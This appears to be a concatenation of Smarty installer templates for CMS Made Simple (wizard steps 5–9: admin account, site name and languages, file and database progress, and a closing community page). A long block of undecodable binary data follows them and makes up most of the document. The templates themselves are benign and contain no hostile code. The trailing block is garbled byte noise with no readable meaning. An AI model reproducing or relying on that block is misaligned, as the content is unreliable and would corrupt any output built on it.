    <p>{'info_installcontent'|tr}</p>

    <div class="row form-row">
        <label>{'prompt_installcontent'|tr}</label>
        <select class="form-field" name="samplecontent">
            {html_options options=$yesno selected=$config.samplecontent}
        </select>
    </div>
    {/if}

    <div id="bottom_nav">
    <input class="action-button positive" type="submit" name="next" value="{'next'|tr} &rarr;" />
    </div>

{wizard_form_end}
</div>
{/block}{* wizard step 5 *}

{extends file='wizard_step.tpl'}

{block name='logic'}
    {$subtitle = 'title_step5'|tr}
    {$current_step = '5'}
{/block}

{block name='contents'}

<div class="installer-form">
{wizard_form_start}
    <p>{'info_adminaccount'|tr}</p>

    <fieldset>
        <div class="row form-row">
            <div class="four-col">
                <label>{'username'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="text" name="username" required="required" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'emailaddr'|tr}</label>
            </div>
            <div class="eight-col">
            {if $verbose}
                <input class="form-field full-width" type="email" name="emailaddr" />
            {else}
                <input class="form-field required full-width" type="email" name="emailaddr" required="required" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
	    {/if}
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'password'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="password" name="password" required="required" autocomplete="off" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'repeatpw'|tr}</label>
            </div>
            <div class="eight-col">
                <input class="form-field required full-width" type="password" name="repeatpw" required="required" autocomplete="off" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
        {if $verbose}
        <div class="row form-row">
            <div class="four-col">
                <label>{'saltpasswords'|tr}</label>
            </div>
            <div class="eight-col">
                <select name="saltpw" class="form-field">
                    {html_options options=$yesno selected=$account.saltpw}
                </select>
            </div>
        </div>
        <div class="row form-row">
            <div class="four-col">
                <label>{'emailaccountinfo'|tr}</label>
            </div>
            <div class="eight-col">
                <select id="emailacctinfo" name="emailaccountinfo" class="form-field">
                    {html_options options=$yesno selected=$account.emailaccountinfo}
                </select>
            </div>
        </div>
        {/if}

	<div id="bottom_nav">
        <input class="action-button positive" type="submit" name="next" value="{'next'|tr} &rarr;" />
	</div>

{wizard_form_end}
</div>

{/block}
{* wizard step 6 *}
{extends file='wizard_step.tpl'}

{block name='logic'}
    {$subtitle = 'title_step6'|tr}
    {$current_step = '6'}
{/block}

{block name='contents'}

<div class="installer-form">
{wizard_form_start}
    {if $action != 'freshen'}
        <h3>{'prompt_sitename'|tr}</h3>
        <p>{'info_sitename'|tr}</p>

        <div class="row form-row">
            <div class="twelve-col">
                <input class="form-field required full-width" type="text" name="sitename" value="{$siteinfo.sitename}" placeholder="{'ph_sitename'|tr}" required="required" />
                <div class="corner red">
                    <i class="icon-asterisk"></i>
                </div>
            </div>
        </div>
    {/if}

    <h3>{'prompt_addlanguages'|tr}</h3>
    <p>{'info_addlanguages'|tr}</p>

    <div class="row form-row">
        <select class="form-field" name="languages[]" multiple="multiple" size="8">
            {html_options options=$language_list selected=$siteinfo.languages}
        </select>
    </div>

    <div id="bottom_nav">
    <input class="action-button positive" type="submit" name="next" value="{'next'|tr} &rarr;" />
    </div>

{wizard_form_end}
</div>

{/block}
{* wizard step 7 -- files *}
{extends file='wizard_step.tpl'}

{block name='logic'}
    {$subtitle = 'title_step7'|tr}
    {$current_step = '7'}
{/block}

{block name='contents'}

    <div id="inner" style="overflow: auto; min-height: 10em; max-height: 35em;"></div>
    <div id="bottom_nav">
    {if isset($next_url)}
        <a class="action-button positive" href="{$next_url}" title="{'next'|tr}">{'next'|tr} &rarr;</a>
    {/if}
    </div>
{/block}{* wizard step 8 -- database work *}
{extends file='wizard_step.tpl'}

{block name='logic'}
    {$subtitle = 'title_step8'|tr}
    {$current_step = '8'}
{/block}

{block name='contents'}

    <div id="inner" style="overflow: auto; min-height: 10em; max-height: 35em;"></div>
    <div id="bottom_nav">
    {if isset($next_url) && $next_url}
        <a class="action-button positive" href="{$next_url}" title="{'next'|tr}">{'next'|tr} &rarr;</a>
    {/if}
    </div>

{/block}{* wizard step 9 -- files *}

{extends file='wizard_step.tpl'}
{block name='logic'}
    {$subtitle = 'title_step9'|tr}
    {$current_step = '9'}
{/block}
{block name='contents'}

<div id="inner" style="overflow: auto; min-height: 10em; max-height: 35em;"></div>
<div id="bottom_nav">{* bottom nav is needed here *}</div>
{/block}
{block name='content-footer'}
<hr />
    <div class="row message yellow">{'step9_removethis'|tr}</div>
    <h3 class="orange text-centered">{'step9_join_community'|tr}</h3>
    <p class="text-centered">{'step9_get_help'|tr}:</p>
    <div class="row text-centered">
<a class="action-button social facebook" href="https://www.facebook.com/cmsmadesimple" target="_blank">Facebook</a>
<a class="action-button social linkedin" href="https://www.linkedin.com/groups/1139537" target="_blank">LinkedIn</a>
<a class="action-button social twitter" href="https://twitter.com/cmsms" target="_blank">Twitter</a>
<a class="action-button social google" href="http://www.cmsmadesimple.org/support/options" target="_blank">{'step9_get_support'|tr}</a>
</div>
    <h3 class="orange text-centered">{'step9_love_cmsms'|tr}?</h3>
    <div class="row text-centered">
<a href="http://www.cmsmadesimple.org/donations" target="_blank">{'step9_support_us'|tr}</a>
</div>
{/block}���ۖ\E�-����~@��~�@Tq(�D��/1��ͥ�̌���ןi+S���B�%ݔH!���v�����/����~���^����?�����bC��k��o����x�������u�����/��//׷��_�������ǟs���o<��/ﷻ
]_����w/�	����KdJ�F�c�݈s�<K��N����o�n�������n���m�߽��PN�>K�-D[B��K�\�K-��rx}���r�;�B��R2����j��lZ�-tKHٽ��~�[yq-�
�n�_tt�{�7ۛ�W7���ճ+��]�鯕��7����{+AN�\|�n�b|䑛d1��x�z�����U��!�
��o��ƷBc�^�ƾ�-X:��Hn��O�ky|��
n!��Xcʡ9,W�C�g����k����v=v�W���;���C�F:�`��*
꜆c�L%��G�����8-��R��#��e��ٛ��wҿ�7!5W�'�%�eӼ�0؏���ϛ{���ѹ��Z�1͙�5��zy������k�ۿm��W�]~{����D>|��d̃�����F)�PGϙGgSŝ"�z�z�����ۀn+L$R���#��Ilep�'}�.����H��%8�i;g�|u��.��W�ם��]�N����>���}�u�sX�1��x�c�t��͎^o��rq��2�&����ukk��S
u��n#c6Rd7Fo��\C�=�Mַޓq�z�H�w[��
]i�[��7%x�Iq��
{�5 �%ʱ�����G̏���r$�{�si��n�_8��'�2A��4�
I���=7��6l�D����K8��_Jʵ`r�9$�5��z�������|�4�F�>��s�^]�t��@���r�b�1A�¾6����+y��5�@ 6�jB�f���zp�l���!�����\ۇ	�u��c��\��AL����%�f����?�6�y};���;<H�9P�{��929^2ֺ�_ϵ= �堠UB�� ��&��K6�ޭ���c]s���I������EZ�|�
?;�����X��R/y��N��'xeXÙgʘHn`:ɧQ� l�H���^�����?�.4Jn�}t��@pz!Q�^��P["H�/m��B5fwo�_cv��y�>��pB\��Ea�BC�ð���ý}��z�n��
��v�YĚc�+�~I<^PV{�5W�c�+��@�F����K���B�D9n�?n�/7��e������j�jf���)'?�%�^ѓlpm6Z�����.IM�"�7��`�)5��7�O�8�h�4�B8�f�QE�>]
4n�-�؟,'G5s���F���9�4@� ;���%���X���#��(ٔ�y_�s����j�����q(��p�o�����l+ Vp`=�@�̣��)���%J�ݽ���'4�n	��hy0h��6#���9���KX��q��8Oq0�7�^��&�V}�u8t�!
,���
���6����stôJd+%�(���3�:gK�H�9�t>��15Z�X6
fo\&���Fd��F�
�?�]�m��\����;�-��p�g/ؠ��K���Ϗ	�@"�\�mL$5�C�ɍ N�����fv�6��
���&g��GDsa��a�����l���MJx�j���d)��we�y��=���h��P�Y��:rҦ�b�BL�����N�y�=L�kY8H�6!t��:Œ����@�&�=�[��^��0�D!%�v5N�[��9��y�g�0�c��%��8̨���~��!A�7>�q�Z�R��9!R:s� �f��������E�P7�%l�Ɉ�7=�=��v�5���XW|� ��4|�#���_��s�N��!Í	�F����Y�
�E<����a�$pAh��Z �Ur�����[3�K�p���9
���D�g��үf��*�ޒ����(��X9{b�����W�Z�DI��H��|���قa���=��B���:H@	�υ�>?8P�"ζ#�1��Bm��'��k�5�QR��3�aKĐ��h*��l噞�mn�zǒ+U�8S
�G=K���ҁ�f��Y�#���}"؎��CW0n�–k8��l�g��V��9�sKP��+35	�Y9�6�n�wt=[7�"p\��2,�&�)��ԓ��n��,���P��HK0����B�t(��Kπ������,,�|����43x4-�QC
�.Y���^ɍ҆m�C�R+��$t0G���:s	^��+^�>�k�'�!nWBKϏ�zGt�]<�~r���A_����g��Xs�@��":��0���<)�K��R�{j����g�7��&g�R��U��P%�…Pg�7X�!��T�s�mqH���_QZp���v�onN�,��v3��p�W���N���.�p�x;�)�A&o��Q�
�
������y��a�=��—2���#��!,4'
�x��ֻ�qŴS����c��Ii@n�A��X�@��g�1 �"�"�pǀ��+ ��v�@���j�C�`(�7�|���a˭���y�7П2�S}�?=����}���A0�8�ѩ:c�[��x��x6�W��s�c�t]��.Y���W�^�
0���u���$=����Cy{㜽�(=󌮟x��(���ެ�WoS�Xc���E���k�͘3F�z$p���j�&L�Dϥˈ�H�%�:�9�sK�JG�ֵ�ĉ(�c�S
����<�no�0%����@���Y�r��W�����f�i�{3���)6$`ZH2���D;j3��A���+�J��r�?�ſ���M#�3e��M�W|(�\1����k-�䴳��!�[�^Hl*�AB��D�*�q4��2†?o�wZ��fPo��ySPW@�d��s�P����!���1�
�A�Ќ��Swg��c?}?Kn6���o���0��T�C���q�*]����^���n�,���ã�0l�"��(�'��kEʩ	�_}��io'�O&N������J6��W(y*��ȉ@�O�m���z��fw���g��:���Bͺԯ�L�?���$J5%wP�P�{�����C���'�~$�{\�neV4��
f)����'��c��J�R|�{TPA8$��ꭗ@c��L��DvI��r"���)��'Nq�|�=���7P/ɆG���ZuP��l�˿����V࣢��Qi����U+��|��EO-�舜TZ04�-8��P�T*�����������8�]���@1��9u
��Q�e��-~���l��l-f'��V�b�B�����o������mT�e�;��y�牟�\�~>���G������
��G��:�|��ٗ鯣��G<g
�'��96���ڞ��#�S��S�4�d�����e��fg�[�<<��n}�\�D��SJ�K�Kݻ)�qL�s��2SZ���
�_���w�>�J14�!�����s���	�~=1����苯��wA���[��lɖ�Af*��%s���NOl7����'��'��|77_k6�e=n(�ZL���;�8Lr��Xn��|��#0ͬk)#�ckkED�րi� ������^|����֫qWjI��KT�&PX
c��_���嫙��^��>1��Ű��i�P�>\t Mۜϊ?�==�ݲ&���������}G������Ad�'�"�GxJϭ#<��=nF��>B��ܐ;U�&�;ٛ6���SDD�5�@N!�JG�2M3��#[4��}�G7��WGވ{꣺0N!�g�<*�F1m�Y���՛g�A���W��۳P���5��M�@(��S彷�H\o�^�n����R;�z2H��:*�6OHp�E�{o�ҕ�,�:���&�f�p�.
�p%W�z\r 6|�$D(�����E/	�j-Ľ�}>8�`%�g�-�l�{�B1[^��}X�@\Z�'M��
7㚴@5�����]��8���!(U’��`k�׷�-�|z�I��8x���J�Q���ƨ�ã���;MX9PoGp`�A�a�đڋl�M��  f�V�
Yx)�V�D}������#~�́ 85�f�ZwuDkit����{��%�+CJ	5��-
3���� ã~ E�}����%���e�	� 3=[Cq�L�Ё�d;4�v�_�2KR�:��d��{�:߇'O�l6)�r�z�>-��?���K����&�P�%��&�ZK��Q���W��ڎT��!N��L������rۯ��.��1[�>�X,�0]O;[5�����<�1pGĠ� *�M�3&�23[�ͦX�U����ܓX�n���8��3��R�%T�<�8X�啅b ұ����q0Ǡ�op>�;Pܣۜ���8M1��7ɐ�YL�m���ºX|� �7�˥�i����?��Ǿ�x��GÃ�V��nx�������aq�I
u8z8�Ql�2�֬M1�s9��?ޗ��4�Cҧ��ۤ0�x�Ɛ�L3l�����xx'�Kz�W�^h����1ݾ�<�/��ի<��9x�g�}�{��Ä_���`H�3(t"�O�KB�V/^=�wM"�t�8𰀵Ad}�U_a�聟k�K[�]H������5���5@4v���
,S&���p�/��߬���i�k���{���8����7%bH�KB�v�z��D�W�Ŏ(zu�X-�T�ZC��꒐����'��I��W`�Ѧ�⠎�mmH�c��.�O����쿎�@g�
+���G��_��^֫��i�k�g���#=6�����8
��%S��$d\����i�k��*+Tn���h����&������.��o�=�wM"��l]#��#ɔb�K82�$#`pKBn�W?<�wM"����
p�i�~y�h���P,�E�56�o^>�>��=]�+fd��R��DՏ��c_�_r��qh�$2�*�C�PI�	�ށ+�c�m�E����ŋ'�.�w�����x�`ڱ|<�!����ڬ�|�}�D�g�@(1���t�{��gv�~B`<O�]���Ӎ��������G������W����q{�TG���b��3 G�
�O���.d�^�|b\8�����)�l������׷ܭɢ~m�W/���ߥ"��ج�R�(_� ?	�~����׫���i�k��_��c�-��}�
H�,��Yt��������������
ܨl=�*�a��E�_Z��}z��=�hl��E6T���c���63�����ᄌڮ��6�A�C�$P@_����t!���>-V�{'3����y��"�?�>�֮,Ӭ_����}��D�G�I7+�[�o�AF4��[�ҹ,	��V�ߏO�]�ȽӀd��i
9���׃�!�����p�����'��I��}��i~b@a�ؼ�uSrn���O�'���5��D/��'�Hm�5jA6}3�讷��^=1]�D���w&d��5�2�^>����n��ӿI�猉T,<Nj��?�q9�ݬ����7�a�/�<�|���T.L��U��M���X��ʢ�_�շ_?�=��}{�s�ߡG��!f�_����2<�]}��tYE�וlZje��5��ȴ�J̹�E����WO��'�{w8up�֥�6 b���r�R�v���úI�^|�Zd	h@�Q�S �h�o�W��D�W��sz�l���d�tM	�[���e��ӿI�m'���j���Ϯj����x~Q�v��OO7'��tFF�O̽���j�6�w
�ș�__>�1�_��K˄�A���Sɷ�����z����׫WO||5��/�Z�G�Y_E%�9A�|���"���]}�Ĵt�� �,z�WlMz��j���}Z�l�x6��?�>N"��}ɰv�l�NO�LEɇ��迮^=�=N"���d�іjB0
�G����%���sh�����$r�~��\v�'F����e7LJ����շOL�&��e)�/��uD�0k���AĴq/�A���O�M*n�^ 9hU�hZ�n��J2Z?�~��v�Ms�L�^�=t�XV`{E@���}��C)݃�3�'��p�p�2�ހ�����x
jG-��ɛ�u�H6��!�J:LqX�ލ���%���E��Z�ČT
0C��Z�1�`��)v�"�}�Y�^����O�Zg5�[P��y�6�-0�:[�c_d
�c���a�. 6T������k,v�$��U^nZ-׎������v�ѻ|(ٔ�d���j�ɚ��\3���=�gfzg[�d�Ғ{*����M�w�O��0F��TY�(I�Z�jH'�S�{u�>H�YM��e!��f�1r1.��0�
�p���w��*�1QoD`�2���9�v���zM]K�ce�9��+�L���
4#��V<V���9������#��B~�(V"uk��|�rq�=���K}t�G�^_����]LY�~�����S��z׺G&����gE,�wW���G���MO�¿���h�Y�DŽ��� ��*�=8+L$�����t�m����}��gۻ���?��VKeШ���hfy�جP�,��x�[\�a�nYS��}5H�<*�E~������ۅ�Gվ5�SM�j�C�;��m���g��*k^X��Y�">L,�>����-_���j��݂9�@��?�FA]���m:w����\}�z�dqey:�e���i�^��F�^y̝9"X}���(�Ye�کѤ�f��q&���c�wo5#j�(ˠU�i���%�2��D+�s��B��Z�j�=��s�gI��	_),�ܺ`x�*;)��5�I6�/�MC���,��*�Y���.]4�!��N���J>	U]_�cE%B��Z����K�M�
��d�����~�ߦ<���|��Ǥ< i�d��Meɋ�#����x���_~�uuĖ��`�.��k=i꿦-�h���8A���ߛ����g�u.����u��&͝$I��iP��t�E0J�[��zh]���dS�a�T^����K��RK�������wЬ��/�^��I�D0*�H-��F��K�x�����C^��g����[&k�*a*|
�a���Y���-k�㣁q�Lt�~
��i
�����y�5�+�\�}d5A�(�}�T|oP���w��'o��N�j�a7Ԯ���֓�T���&W�-�J�\�^/uR�Es��6jRg�,�V���$��K�'����Z�<�A�-�
�aa`
��;0V��ei���{���I-��Z���05��\�������{-E�'ʠ���Z�DZ3�� (%!��X��/e{����GF���ޔf�Y�����<���7�������A|);���S�:����G"���&~�$3t�<�a�Q�֥�ƅJZ@ƷG2�����]40,� Q��$���gY264��ԋ7�	+���7<�C��`�#��'D/�C��ro�P쀘-P)(�;�� �ݾ��J|D1.6�����	�/��x��p��uY������uL_�F3f�����L��q@���eK�H���\��"�)��w#y����$

_S�0��G8�3���+�/���c������w����é�1�56�7ԥ�THSm���g@�������[�j�{���c
~���&�]����)�G�vv>}Eڟi��S�x_����{�Z]�5��$�,]�n֛o6t3+ICV�[�fкVp���;��<����^�_�:�/<�Cb�b
�d�o�
U{���7W��Y���#(#�7}���@Τ@5�=��5*��V���b�PΒ�b��d���ӼY��������FF�dUl>|<t���o���3bl�>:��&�$R��i��~�bR��\�d.+�e�g���I�=ϼHW��ٵ2,B�pE2K��Bv���j=s�CcӇY6j�ɦO9�kvetcĞ+������pڠ�<�x8��r������Py�>�}�[`Ƞ<>G%s��)�l���̖��)�ȏ�N,\�5J!jlN�~����;��(:�*���tP�*������	�{��Cpa*�&꘴2y�);���'��GM�=|����q$B,tUA
�-s�'X����I�j���Y-:p��j�X:�uO�
V��{�|����M1����
8��A
��z+�N|��_�mr*ر$,Dp&�l��^4�:M��i�o�2��ڍ�!_*X-bJ+޸�Doֻ�~�ER
����4��%�7Hy���Ľl��o������b����`m�U��iu�]s�WۇU�m�(�m���l�:�}�DžnO���z֛�.�s�q�D/�LM�Qpi���Fh{���}N]9p�S}z�=��
����D}�_g���}I��^8�C�����D-_�?�N�⸆"�k[Ѽ��[hl�;��o�-�z�$�Y�:�R��PE�t�g�⊵O��l�U�[}v�%}+w`]2�3�֝�����p��	�v/�7�Y�:a_5���x��V��C倎$�
x��F$e >�J���j�-B�fC�:��^�8�8m���훅�*��q��h�w�ē�I�����B�ҝźt}D`
�IEMɖP"�����3+�
��OP����d��?M���
!�WMȂ�{�c~[mO޴=���n&��>􊺚F�È4���I_���(W��Z�D�e��ZԊ�ى ��s���Ɉ�|}�;��e���J��Z��YЮ�
p�^�u���N `t�0�5iu��&�S�<6���2@e�a\�A���U˙e��\Vo�7��k�9׊�*ȼkl�O�Q��;=}>��=G[�� N+㔂EM��	��a�����OPg�V=bO`�����:c�vʗNZqxZ�����>��D�bOX��ԭP^�<$���Lko��L��z���^� ��C}�6���s�1�P��T�c��$D��O�V[j�؍���uNþ����D^ߎ�׋ׁ�#�r�|�h�ZH���@^�=��<0�C�ذ��5��|�zJ�'~9
K�7t+o���y�7�K�<�x��w�&�aA�O�𯴜�l���׳K��.��X�*�H(��6�o��t��,���Ք-�c\�6�|�v�FaΟ.a�M��Yc�*�����S�1H66ٻ���O������괥��Ae�Ŏԁ_�*��t�5ޭrZƲf.�
*
(Rv�5��A~���v�77�+�
�:�R���.��Z(��A�y��H��$���	���Mq�M& �,����3�[T>,�B��0���� X���8˜�
�/Nj�g��<�Ѓcժ��2�f��l6��5/�����z��N��u/��=8
nW�9@t��Z����X�����f�N9u!z���>�xuu�����!��h;�A�kI�l���LѶ�_v�q�P+������%(qe�s+�lrgR_�k�K��t�����x�G�s ��hMW�e�P	��ۥ��a]Ϧ�
�T�Z;����B�v˦:�﹃md��߰��W��2!h�a�]�!N��z2N�ҙ�����H+,���7���V��}|<&~#�O�b��iul;�{�`	6h�
Mf�#\:���կ���N�
?��6W�1�4M��j�wF��h�������'���Yf������.��%��BK�bCx�<�_�
א�^{(kt&-����)$\�[���̟m�꛳�5R_ګh`Yk�܍���-~O��)��0��~����u
�&�������������z�gD���![���m����kd�|_���͟)fg��X*�y�����HE;��K�r�����uR6��,?	
C����me��$�c&*@:����r)�H���s��fݯ�Ղ��ќ��J#5�_�B �@�a��=�z#X�Y����]����>����U��=�'v��w�cJEs&��^8����HTF|���)�y�G7������k~Vu��¥�e��
�P3S�-�Ҵ��@\W�RB������:��m	0%NK�4��% �	�w�]@įG��E��Z餽OUm`�h��k\�\cx���>��~���8-�iK���(���>3T�0܌Z��7w���i�J���>Y����
	�鈃{�7|�r
D��v1j[�U�-�������)jw�Ժ�>; ]]�W�"�I�����L�
���%5�"$��?á���7!5���6�TMr�;)l{���M'�r�UrI��+�8��#�R�_�ym=c��>:Z�JıT����+��>?��I�#�/@r�i#婜y:B�ﮮ�v�f�rQk'T��Z5E�k%��V>��^�����,�Kj礡���`���pt�j�繸�!�����Z�
V�b:m8h��h�xdN��(����f�l�J
P��6HOչf��|��͟����(�<�>�þ8&��	�mU��)���#��L��8�O��
�L�rB�`y�jj��H�B�G�>�.V�
��؈��k�m�	��z��c}�Gڬ�	k +�As�p�v�w����s��s[�����i�~n��^(�cLi�A�*���g��w)$=ر�
%�.�i]�E�F����SN���F���n,�@�hU��(
9��Ue7Xf���<�|��f�������Z��z�X�e�CX5E���.
H�%�/R{��nwP����)�}���@j7[/-���GG%)�=�>�춸+�0�4i{^pT���	��s���re#jW��k��V:5S�˹��l�3��e�5�1�XHi�<nPݥ�`я�譿��'�+g��-��+M�v��J�v?S��ەE�o
���d8�6$�~�I�/��W��w%��`�i��״O.E�d��E�G�,̩�1Ĩ��GhS[3iXЈ�Z��@��c����)���{�'"�/`1��6۹v ���N�@:���=��W��Auy��*�����m����J�S�Bg�.<��!�Ͳ������b6_h��0[�R<�YNs�/��yф#�顷ю�S�̀���~?M\�dT��p$�}M5�d,���t�9"���~n�c��R��p�� l�47T�2�⃛�;��s�������n���sbN�E������Y	����)�j������Ɵ��g'˛�m�H�ױS�koY׸ˇ��'R���<M��
�^X�
Ƣ�ڣ��Zzʳ�c�	P�FN��8��L/r�F���v1J�B�7`N�yc� ��Vb�/֠ŋ��T�Y��.-�f2��e�՘_�/%1z�j��'�d�F�fi��#=R��/����BE�� ��%�3�MK�R�c����9ʞ�-p�Pp>�E� CS�O[^M���W�Y�f˪�����,�i+0Svŋ㏈\�ߪ���,�]�}��ۖئew�~���@��ޮ7��f�l���+t��h2��Ik�)m&F�´�~&�~}��zq��M=�	h��t��{PT��|��\P
���9�xѪ��+h��\]_A���鍆�9�6xܮMۣ�L)�md%���46���0��ˆsn�$ZcF�4��p�{�����v=1�y�+D�^��)�g��(��?:��Z��V�;���+ܰ��
��W�p��v�S�'M�n��ΰ�k���ٖ
��b.$�~��<G����n��``S7��Aog}vK�ڑS��%ڂw�n���'#�Fqt�t��k�}�&�t�n�Ou?t+-J�7��PKA�V7�
V=��Z}������೷�����s���,	�r������@��
�[8��?]�k���B�|$�Ͷc�%s�Ns��֝�]���:ڔ�n����>����?�L>_+|��X�@h��ġv�ݪN�Y7mu̹Pi�Akn��P�&;G	~d�ÄS-c�&�Z�a
O�,���v�d�<ۏ���&�Vj=߃lQ���3dP�dS��q�Ag� 	���̶��d��.i�X-ߠ�f���s� �W��D�AuWD��.
���T}����_�nk��Ԙ��iU�1��[�yF&[P�y?�X@�|��¥&�ҷjzip�QD�X��RT�P!|o�(�4lFdm�!�bfs�� r~�+��ur�A_i�j֖ڡx}��O����=�kю[�!p����ണ^ӴR�m��L�sB����'�����I�6�_e�%}|*�c'��}�>��/=(3������/�Z����PR��&RUl�d���
w��p�emlJ@P���:;���y8��͍L9M������8S�	
V^[4�P�&�-�,�c�2��Kĉ�wZ���
�3Kp�3�pRO���[Q��[XG��|	L,coa�C���C�E��!qF�T|E��]Qp(DG��@}57b��k�N������:h��'�"&��2��}59jE��t/n���Rn�Eh�E&������GI��gNs��v~�L�!�dն�Ux�?s�������LU����5�x�X�����_R@n�W����yO��J�j
���d������ P�;�y\�6Dƪ
���P-`9��uM�DP��x!?�I�c���/���K�ZG'��+^�eK-C[8�
��>'�t��e�D�0�c|Ekq�굄Ej���e�Y�u����P�s��*��$Q����Z��&�n+�L��[�����z]���G�]�E�v׺ȣ(�������"�h귨ǧKD�F�������$���=�Ძ��Z:ƃźQ�i�9�Վ����4�nGn��ٯ��`�V���\��kYM�7?�x��˯���k��ʠZ�ӵ��B
ȱPE��3��/_��[�������ū��v�(ć���|��l�l���V��s��ZN/U��&�w�֥j�avy~2��H�,���-|����8���~��)�W���_����~e���v@���c�n^B����z���7ۛ���z�p�Z��qO�M��j�/-��~=�P�٬7�x}�]�?�߆ �|z�V��3���4�f�r�ZVZ��`���s��mm���D�f${�ܦ�KH��Ջ��r5��`^�pQ�v���>8P���m�X�����G��h�2�q�4@
>,A�ޤvD�W߿�����[ϗG�o�ȊIZ*�VY�ԍ������Ky}M��h��ߗ�D���+�����0]��^����n�׿<����3�0��5���'����έ�c�p�q��d]/���}]��r��X�u`{��V�1��LQ@��SR�t_X*p�Sq�WjЄ��I4z��ޏ˟ޠ.��^���Ͱ�zKŶ
� �2B�O�7��X�7~8�,�?�@�P�"��7W[^,���QCqi@���<�j�Dk]m�T�L-�?�2Q�^ܺ\��Sb!�$��G\�#����!�}pb=�N�#�����J��|���' �$ZJ4�g��T�
��9%xc����͐�Vq8u�;1�ӻ
�CA��{�Ǻs�rj�*��zb%
#X8������c.sj�{#7��d�d%&-��v'��Sk������W]�x�h�Z��c�gpt�D���PO��S��T�]�4i�_m���N��Y�|L�"}�:g_M[k�UwN��E}��k@TdT��}}�nt=w�K�\ԋ��G��`׃Ϛ�A�‘t!�n�zٍauGSk-���O##@���I�"�{�����
ks�B�9k�"6�#�2��;eE��FH���IUJ�&A�O�S���߿�~2�ۧ�dh�L�	�<V������
�a�'�e�d��0�;�[)�UBP"=Cic�?��[�zL��q}}���6L�;e�`�Jv�a�Q`B�����Z�C��.�Į��x�f�K��ǖ�6BK��v�ndk��V����S�G�o�����0J�E����78X�j)p׃�:�?���:�5�
8M�(���J��G�êǃ���s8�F�&��݇�i� �������e�դ��z��V���j~A���N�3-4{M�f�†�s�)�s��K�{�:U~PO�q�����z�o�����m�n�7��
w(�pm���i��t(��s|;���k⟇�ң�_�%m�E����h�܇/mg�ޮo�9��4x�Dإ�i�-)�˵2u1���J���3���.���iqī���J���/�e�OZ��7�aC,����E��5�t��>p�<MA��!V��.���(/)�^��$^�MجO��}�'yӛ�y纖������yX%�0��4>>���/����^~���CZSz2��&�>����2B.?>v�?���~���f̴�m�!d���0�*��a��~۟�\��~J`,��(���W:����)k��w|l����	��#�n�	�K�@+��L�k�K�����#��$�����q�rNZp� �����P�-���ڹdH�y�����
����JܵazJ��+���|�7����9H���ii�������݉�����b������4�<�Z�Rk��u@l\�c ms�P��9Ƃ�,e7U+N�0P(6�]<�X��b��r�(hMLŤ($���n⒡���^ι��i~ɇP`A�a��Xe�����0n��F�
��ڥ��8�$�������ng��vF�gԒM�����3�R2bf�
����e���\�73�7��ھ��Z"4M3��������EpÌ,��ԓ
�k�Ƈ�gu{=��b��Z���V����
��~�P���t�P���Ɓ^ı�Ek)���c/j�HكI�⊾ɡ$�T�;�m�˽żƉf�xn&A�㠡/�]��`�C>C-V<EU`1ҁXy��2v�����x���Vɘ�^����5�I�5�f<�˕p7Oi�V���H2����»�
\���&O��*���ڇ���m�N.�ˇj5��EK�g=�JASa��e�z�����`'�N��˘b�����1�����*ŧܤ�^�meHєS�����z^�H�0`n��"���(�j:�Hf��ֱR4��Q������S �ѡf�ɸ*����2����@@�|���E羧��+�hHjJΦ��H�6"C=�����%��f��ka���-�Vv輦�ʧ���m�
�d4�� 6†PG���NDN��צ)TZ
���7p�J%x=�Jݜ���?�z񔻷4I� M��x�ݴ�cK�T
�4��?j�����/~�Ǚ�.�~�vp�)-��SK�%-���r��2�� ~+;��Pt�
J��&]��N�}X̥�	��L�c���\A.��[�&4�m���}�O'�@�n����t�3�6){�TLlN�}쳍�l
��)s'��/D�n��e��袜�zs��4�pH��@�ZD#Վ\Q��v<r�t�y�oj�k���;Ǥ�HFuܦ@���1�o���J1�ת/��fk%p��gK��P�6W}�8��E=��5����^�5�9�;-�\;*g��Ǿև���r�aBS�E�V�>����h��LK�w;�Q]˩
��C�>��7�{����o�n����)
گ%L*#f��`��
ާ�V�
~������O�'��,1�e�'_�b*"O!d�	���l����m�n��,�%7M9Z�?�����۶������js\#yJ�v�k�:knW>-v�����q��6'X�8uat��Z���'��^��vF5�W@ ��6P7�
dI�i���b�lV9[[	���Pk�t\L��z`������꧗�F��Rl�%M���w6z&>>?Y������t�BM�C��Ӎ�tl	.��v���?�JoI{�丒Ŏ�����UNP������(r��oi�LW0��T�>��s��]}����u=ꞻL�]F$iS*3,�+�OX�_W�^�5[U[�^�m7�P�|���6�/_.TW#C���%64�}���s��^����?�]�JAY����%-p���pOX۫��o�������@>kQb�|T7Q�EجW/g���:���I�5�靴^�O��ޭ��i^`%:�X�2�}�X��!��	���~���9�����M��5�ϗ4�Fa�6�������gpe�a����Y�j2�hk�$�p��f��^s0S�L�RtT���11��c��f����!�����*_`�1\�}�'��.��_�)��/gkK.�#.N�ҡñDP�0E��a��v�`�1�ȝ��<�R�!�LZ�	��i��ϟ"W}OC
������,�ek2X�O����ū9����J.��O8�i'`�6��9E����sbJڒ5f���(��h"f���8Ad�z1�v�����r�\2+ń	��Np��Տ?}��L�	��\\`VIR���ћ���G{��ȋ��M�9{�rWh)AK͉,f�R�t_��W�*D�f��Q���1�n~=�60͒��S���5��R�$��{��.O��T/���)�q�5�1(��5�*�}<��o�?]ݾ{��1e��)Ǭ�#,f4���pvg�mG���F�]n�G�U~��k�.���<`��>.S3�xN����I_�ja$�Ѽ��K�x4�q��j�N�E�Yؤ��}�"uz�*6���7�lһ�*d�ʨ^���KPU��%Tѧ�G��q�q(��#v����AE{���:���/��������s��<�{�aLi���>�:���o�a�b���~A�W�٧�5Mh���G���D�udR��q��2)�9�Ϗ�x�uck��t���ˍ�O�h3݃��F�����'���NԳ+�5N�h�d*@��Po
